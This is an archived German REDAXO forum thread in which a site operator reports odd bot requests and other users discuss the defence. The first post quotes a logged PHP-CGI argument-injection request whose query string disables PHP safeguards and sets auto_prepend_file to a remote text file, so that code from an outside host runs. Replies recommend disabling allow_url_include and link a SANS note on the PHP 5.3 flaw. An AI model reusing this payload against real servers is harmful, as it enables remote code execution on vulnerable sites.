Ich hatte gestern auf einer Redaxo Installation sehr seltsame Seitenaufrufe. Mir ist schon vor längerer Zeit aufgefallen das bei dieser Domain extrem viele komische Bots unterwegs sind mit Aufrufen wie /admin, /administrator usw... daher habe ich das etwas im Auge behalten.
Gestern war ein ganz seltsamer Bot da der 17 mal in folgender Form Aufrufe machte:
/mail.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F<<<ip-internetanbieter-usa>>>%2Fchanglog.txt
safe_mode=Off
disable_functions=NULL
allow_url_fopen=On
allow_url_include=On
auto_prepend_file=http://<<<ip-internetanbieter-usa>>>/changlog.txt
Die IP des Bots gehört der France Telecom S.A.
Kennt Ihr solche Aufrufe bzw. hattet das auch schon?
Hallo,
Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.
Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt
Selbst einladen kannst Du dich hier: https://redaxo.org/slack/
Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.
Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt
Selbst einladen kannst Du dich hier: https://redaxo.org/slack/
- Ruediger.Nitzsche
- Beiträge: 2117
- Registriert: 13. Dez 2005, 09:29
- Wohnort: Coburg
- Kontaktdaten: Website
Re: Komische Seitenaufrufe
url_fopen und url_include sollten nach Möglichkeit immer deaktiviert sein, dann sind Dir auch solche Bots egal
Rüdiger
Rüdiger
gn2 netwerk | gn2 hosting | REDAXO Referenzen | Github
Supportanfragen per PN werden gepflegt ignoriert
Supportanfragen per PN werden gepflegt ignoriert
Re: Komische Seitenaufrufe
so wie es aussieht versucht der Bot aber genau das umzustellen. Wenn er das schaffen würde wäre es ja egal welche Einstellungen zuvor aktiv waren.
Hier habe ich noch was dazu gefunden:
https://isc.sans.edu/diary/PHP+vulnerab ... wild/13312
scheinbar war ein Angriff in der Form in einer php5.3er Version auf einigen Plattformen möglich.
Hier habe ich noch was dazu gefunden:
https://isc.sans.edu/diary/PHP+vulnerab ... wild/13312
scheinbar war ein Angriff in der Form in einer php5.3er Version auf einigen Plattformen möglich.
-
- Beiträge: 1
- Registriert: 1. Jul 2014, 17:31
Re: Komische Seitenaufrufe
Ich habe das gleiche Problem. Wahrscheinlich muss man benutzerdefiniert installieren.